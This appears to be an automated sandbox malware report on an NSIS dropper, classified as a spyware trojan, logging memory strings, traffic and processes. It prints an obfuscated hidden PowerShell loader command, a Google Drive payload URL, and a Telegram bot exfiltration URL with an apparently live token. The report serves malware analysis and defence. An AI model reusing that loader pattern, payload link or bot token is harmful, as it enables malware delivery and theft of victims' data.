            Source: msiexec.exe, 00000005.00000002.2599404721.0000000021DF7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot
            Source: msiexec.exe, 00000005.00000002.2599404721.0000000021D91000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
            Source: msiexec.exe, 00000005.00000002.2599404721.0000000021D91000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:048707%0D%0ADate%20a
            Source: msiexec.exe, 00000005.00000002.2599404721.0000000021DF7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot8101497037:AAEvNeES2X17rekW3womq6JjOwgZLJMqX1Y/sendDocument?chat_id=7171
            Source: msiexec.exe, 00000005.00000003.1918747980.0000000000577000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.1918595258.000000000053C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://apis.google.com
            Source: msiexec.exe, 00000005.00000002.2601116550.0000000022CD1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
            Source: msiexec.exe, 00000005.00000002.2601116550.0000000022CD1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
            Source: msiexec.exe, 00000005.00000002.2601116550.0000000022CD1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
            Source: msiexec.exe, 00000005.00000002.2599404721.0000000021E6C000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.2599404721.0000000021DB4000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.2599404721.0000000021E5D000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.2599404721.0000000021E9D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=en
            Source: msiexec.exe, 00000005.00000002.2599404721.0000000021E5D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=enP
            Source: msiexec.exe, 00000005.00000002.2599404721.0000000021E67000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=enlB
            Source: msiexec.exe, 00000005.00000002.2582024062.00000000004FF000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2564398022.00000000004FF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/
            Source: msiexec.exe, 00000005.00000002.2582024062.00000000004FF000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2564398022.00000000004FF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/N
            Source: msiexec.exe, 00000005.00000002.2582595168.0000000000760000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1XsJ-IQr2GvwbKOJx-mhThEFAjDp4uHiL
            Source: msiexec.exe, 00000005.00000003.2564398022.000000000051F000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.2582024062.000000000051F000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.1956562799.0000000000537000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.1954214268.0000000000539000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/
            Source: msiexec.exe, 00000005.00000003.2564398022.000000000051F000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.2582024062.000000000051F000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.1956562799.0000000000537000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.1954214268.0000000000539000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/A
            Source: msiexec.exe, 00000005.00000003.1918747980.0000000000577000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.2582024062.0000000000518000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2564398022.000000000051F000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.2582024062.000000000051F000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2564398022.0000000000518000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.2582024062.00000000004FF000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.1918595258.000000000053C000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2564398022.00000000004FF000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.1956562799.0000000000537000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.1954214268.0000000000539000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1XsJ-IQr2GvwbKOJx-mhThEFAjDp4uHiL&export=download
            Source: msiexec.exe, 00000005.00000003.2564398022.000000000051F000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.2582024062.000000000051F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1XsJ-IQr2GvwbKOJx-mhThEFAjDp4uHiL&export=downloadS
            Source: msiexec.exe, 00000005.00000003.1956562799.0000000000537000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.1954214268.0000000000539000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1XsJ-IQr2GvwbKOJx-mhThEFAjDp4uHiL&export=downloadXs
            Source: msiexec.exe, 00000005.00000002.2601116550.0000000022CD1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
            Source: msiexec.exe, 00000005.00000002.2601116550.0000000022CD1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
            Source: msiexec.exe, 00000005.00000002.2601116550.0000000022CD1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
            Source: msiexec.exe, 00000005.00000002.2599404721.0000000021D6B000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.2599404721.0000000021CFC000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.2599404721.0000000021D91000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org
            Source: msiexec.exe, 00000005.00000002.2599404721.0000000021CFC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/
            Source: msiexec.exe, 00000005.00000002.2599404721.0000000021D91000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189
            Source: msiexec.exe, 00000005.00000002.2599404721.0000000021D6B000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.2599404721.0000000021D26000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.2599404721.0000000021D91000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189$
            Source: msiexec.exe, 00000005.00000003.1918747980.0000000000577000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.1918595258.000000000053C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ssl.gstatic.com
            Source: msiexec.exe, 00000005.00000003.1918747980.0000000000577000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.1918595258.000000000053C000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.1956562799.0000000000537000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.1954214268.0000000000539000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://translate.google.com/translate_a/element.js
            Source: msiexec.exe, 00000005.00000003.1918747980.0000000000577000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.1918595258.000000000053C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://translate.googleapis.com/_/translate_http/_/js/;report-uri
            Source: msiexec.exe, 00000005.00000002.2601116550.0000000022CD1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
            Source: msiexec.exe, 00000005.00000003.1956562799.0000000000537000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.1954214268.0000000000539000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google-analytics.com/analytics.G
            Source: msiexec.exe, 00000005.00000003.1918747980.0000000000577000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.1918595258.000000000053C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google-analytics.com/analytics.js
            Source: msiexec.exe, 00000005.00000003.1918747980.0000000000577000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.1918595258.000000000053C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google-analytics.com;report-uri
            Source: msiexec.exe, 00000005.00000003.1918747980.0000000000577000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.1918595258.000000000053C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
            Source: msiexec.exe, 00000005.00000002.2601116550.0000000022CD1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
            Source: msiexec.exe, 00000005.00000003.1918747980.0000000000577000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.1918595258.000000000053C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com
            Source: msiexec.exe, 00000005.00000003.1918747980.0000000000577000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.1918595258.000000000053C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com
            Source: msiexec.exe, 00000005.00000002.2599404721.0000000021E9D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/
            Source: msiexec.exe, 00000005.00000002.2599404721.0000000021E8E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/P
            Source: msiexec.exe, 00000005.00000002.2599404721.0000000021E98000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/lB
            Source: unknownNetwork traffic detected: HTTP traffic on port 49997 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49986
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49984
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49982
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49981
            Source: unknownNetwork traffic detected: HTTP traffic on port 50001 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49984 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49986 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49982 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49990 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49992 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49979 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49979
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49978
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49999
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49997
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49996
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49994
            Source: unknownNetwork traffic detected: HTTP traffic on port 49996 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49994 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49992
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49990
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50001
            Source: unknownNetwork traffic detected: HTTP traffic on port 49988 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49981 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49978 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49999 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49988
            Source: unknownHTTPS traffic detected: 142.250.184.238:443 -> 192.168.2.10:49978 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 142.250.181.225:443 -> 192.168.2.10:49979 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.10:49997 version: TLS 1.2
            Source: C:\Users\user\Desktop\Kb94RzMYNf.exeCode function: 0_2_004052EE GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_004052EE

            System Summary

            barindex
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\neoimpressionism\Kb94RzMYNf.exeJump to dropped file
            Source: C:\Users\user\Desktop\Kb94RzMYNf.exeCode function: 0_2_004032A0 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_004032A0
            Source: C:\Users\user\Desktop\Kb94RzMYNf.exeFile created: C:\Windows\resources\0809Jump to behavior
            Source: C:\Users\user\Desktop\Kb94RzMYNf.exeFile created: C:\Windows\resources\0809\relegationenJump to behavior
            Source: C:\Users\user\Desktop\Kb94RzMYNf.exeFile created: C:\Windows\resources\0809\relegationen\ernringseksperternesJump to behavior
            Source: C:\Users\user\Desktop\Kb94RzMYNf.exeCode function: 0_2_004070400_2_00407040
            Source: C:\Users\user\Desktop\Kb94RzMYNf.exeCode function: 0_2_004068690_2_00406869
            Source: C:\Users\user\Desktop\Kb94RzMYNf.exeCode function: 0_2_00404B2B0_2_00404B2B
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_000EE9885_2_000EE988
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_000E53215_2_000E5321
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_000E71185_2_000E7118
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_000E53705_2_000E5370
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_000E3E125_2_000E3E12
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_004253DC5_2_004253DC
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_0042C3B85_2_0042C3B8
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_004257885_2_00425788
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_004228005_2_00422800
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_004259D85_2_004259D8
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_00423B2C5_2_00423B2C
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_24509C705_2_24509C70
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_2450FC685_2_2450FC68
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_245095485_2_24509548
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_245000405_2_24500040
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_2450F8105_2_2450F810
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_24509C175_2_24509C17
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_2450501C5_2_2450501C
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_245000265_2_24500026
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_245050285_2_24505028
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_2450D0F85_2_2450D0F8
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_2450CCA05_2_2450CCA0
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_2450D5505_2_2450D550
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_245095445_2_24509544
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_245029685_2_24502968
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_2450DDFF5_2_2450DDFF
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_2450D9A75_2_2450D9A7
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_2450D9A85_2_2450D9A8
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_2450E2575_2_2450E257
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_2450E2585_2_2450E258
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_24501E7F5_2_24501E7F
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_2450DE005_2_2450DE00
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_24501E805_2_24501E80
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_2450E6B05_2_2450E6B0
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_2450E6AF5_2_2450E6AF
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_2450EF515_2_2450EF51
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_2450EF605_2_2450EF60
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_2450EB085_2_2450EB08
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_24500B305_2_24500B30
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_24500B2F5_2_24500B2F
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_24508B955_2_24508B95
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_2450179C5_2_2450179C
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_2450F3B85_2_2450F3B8
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_245017A05_2_245017A0
            Source: C:\Windows\SysWOW64\msiexec.exeCode function: 5_2_24508BA05_2_24508BA0
            Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\nsj9A32.tmp\nsExec.dll EE052FD5141BF769B841846170AABF0D7C2BB922C74C623C3F109344534F7A70
            Source: Kb94RzMYNf.exe, 00000000.00000000.1312511296.0000000000453000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamelinkeditor.exeDVarFileInfo$ vs Kb94RzMYNf.exe
            Source: Kb94RzMYNf.exeBinary or memory string: OriginalFilenamelinkeditor.exeDVarFileInfo$ vs Kb94RzMYNf.exe
            Source: Kb94RzMYNf.exe.2.drBinary or memory string: OriginalFilenamelinkeditor.exeDVarFileInfo$ vs Kb94RzMYNf.exe
            Source: Kb94RzMYNf.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@6/13@6/6
            Source: C:\Users\user\Desktop\Kb94RzMYNf.exeCode function: 0_2_004032A0 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_004032A0
            Source: C:\Users\user\Desktop\Kb94RzMYNf.exeCode function: 0_2_004045AF GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_004045AF
            Source: C:\Users\user\Desktop\Kb94RzMYNf.exeCode function: 0_2_00402095 CoCreateInstance,0_2_00402095
            Source: C:\Users\user\Desktop\Kb94RzMYNf.exeFile created: C:\Users\user\AppData\Local\neoimpressionismJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeMutant created: NULL
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7996:120:WilError_03
            Source: C:\Users\user\Desktop\Kb94RzMYNf.exeFile created: C:\Users\user\AppData\Local\Temp\nsd98D9.tmpJump to behavior
            Source: Kb94RzMYNf.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Process
            Source: C:\Users\user\Desktop\Kb94RzMYNf.exeFile read: C:\Users\desktop.iniJump to behavior
            Source: C:\Users\user\Desktop\Kb94RzMYNf.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: Kb94RzMYNf.exeVirustotal: Detection: 72%
            Source: Kb94RzMYNf.exeReversingLabs: Detection: 52%
            Source: C:\Users\user\Desktop\Kb94RzMYNf.exeFile read: C:\Users\user\Desktop\Kb94RzMYNf.exeJump to behavior
            Source: unknownProcess created: C:\Users\user\Desktop\Kb94RzMYNf.exe "C:\Users\user\Desktop\Kb94RzMYNf.exe"
            Source: C:\Users\user\Desktop\Kb94RzMYNf.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$afsmitnings=gc -raw 'C:\Users\user\AppData\Local\neoimpressionism\Sunsetting.Spe';$Overbefolkede=$afsmitnings.SubString(6903,3);.$Overbefolkede($afsmitnings) "
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
            Source: C:\Users\user\Desktop\Kb94RzMYNf.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$afsmitnings=gc -raw 'C:\Users\user\AppData\Local\neoimpressionism\Sunsetting.Spe';$Overbefolkede=$afsmitnings.SubString(6903,3);.$Overbefolkede($afsmitnings) "Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
            Source: C:\Users\user\Desktop\Kb94RzMYNf.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\Kb94RzMYNf.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\Kb94RzMYNf.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\Desktop\Kb94RzMYNf.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Users\user\Desktop\Kb94RzMYNf.exeSection loaded: dwmapi.dllJump to behavior
            Source: C:\Users\user\Desktop\Kb94RzMYNf.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\Desktop\Kb94RzMYNf.exeSection loaded: oleacc.dllJump to behavior
            Source: C:\Users\user\Desktop\Kb94RzMYNf.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\Kb94RzMYNf.exeSection loaded: shfolder.dllJump to behavior
            Source: C:\Users\user\Desktop\Kb94RzMYNf.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\Kb94RzMYNf.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\Kb94RzMYNf.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\Kb94RzMYNf.exeSection loaded: riched20.dllJump to behavior
            Source: C:\Users\user\Desktop\Kb94RzMYNf.exeSection loaded: usp10.dllJump to behavior
            Source: C:\Users\user\Desktop\Kb94RzMYNf.exeSection loaded: msls31.dllJump to behavior
            Source: C:\Users\user\Desktop\Kb94RzMYNf.exeSection loaded: textinputframework.dllJump to behavior
            Source: C:\Users\user\Desktop\Kb94RzMYNf.exeSection loaded: coreuicomponents.dllJump to behavior
            Source: C:\Users\user\Desktop\Kb94RzMYNf.exeSection loaded: coremessaging.dllJump to behavior
            Source: C:\Users\user\Desktop\Kb94RzMYNf.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Users\user\Desktop\Kb94RzMYNf.exeSection loaded: coremessaging.dllJump to behavior
            Source: C:\Users\user\Desktop\Kb94RzMYNf.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\Kb94RzMYNf.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\Kb94RzMYNf.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\Kb94RzMYNf.exeSection loaded: textshaping.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
